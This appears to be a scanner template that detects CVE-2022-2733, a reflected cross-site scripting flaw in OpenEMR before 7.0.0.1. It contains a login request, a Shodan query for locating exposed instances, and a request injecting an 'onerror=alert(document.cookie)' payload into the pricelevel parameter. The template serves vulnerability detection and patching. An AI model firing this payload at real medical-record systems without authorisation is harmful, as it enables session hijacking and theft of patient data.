id: CVE-2022-2733 info: name: Openemr < 7.0.0.1 - Cross-Site Scripting author: ctflearner severity: medium description: | Cross-site Scripting (XSS) - Reflected in GitHub repository openemr/openemr prior to 7.0.0.1. impact: | Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Upgrade Openemr to version 7.0.0.1 or later to mitigate this vulnerability. reference: - https://huntr.dev/bounties/25b91301-dfb0-4353-a732-e051bbe8420c/ - https://nvd.nist.gov/vuln/detail/CVE-2022-2733 - https://github.com/openemr/openemr/commit/59458bc15ab0cb556c521de9d5187167d6f88945 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2022-2733 cwe-id: CWE-79 epss-score: 0.00176 epss-percentile: 0.54727 cpe: cpe:2.3:a:open-emr:openemr:*:*:*:*:*:*:*:* metadata: verified: true max-request: 2 vendor: open-emr product: openemr shodan-query: title:"OpenEMR" tags: cve,cve2022,xss,openemr,authenticated,huntr,open-emr http: - raw: - | POST /interface/main/main_screen.php?auth=login&site=default HTTP/1.1 Host: {{Hostname}} Origin: {{RootURL}} Content-Type: application/x-www-form-urlencoded Referer: {{RootURL}}/interface/login/login.php?site=default new_login_session_management=1&languageChoice=1&authUser={{username}}&clearPass={{password}}&languageChoice=1 - | GET /interface/forms/fee_sheet/review/fee_sheet_options_ajax.php?pricelevel=%3Cimg%20src=a%20onerror=alert(document.cookie)%3E HTTP/1.1 Host: {{Hostname}} matchers-condition: and matchers: - type: word part: body words: - '' - 'pricelevel' condition: and - type: word part: header words: - text/html - type: status status: - 200 # digest: 490a004630440220571edea5fa5ebf10b8a675acca4107ba9670c4a3b5faec3009ee0da22dbe4144022009a6b12aff9b01e21a9c6336c60d69326a555a5c636bc8a42f35bfe9e1d96943:922c64590222798bb761d5b6d8e72950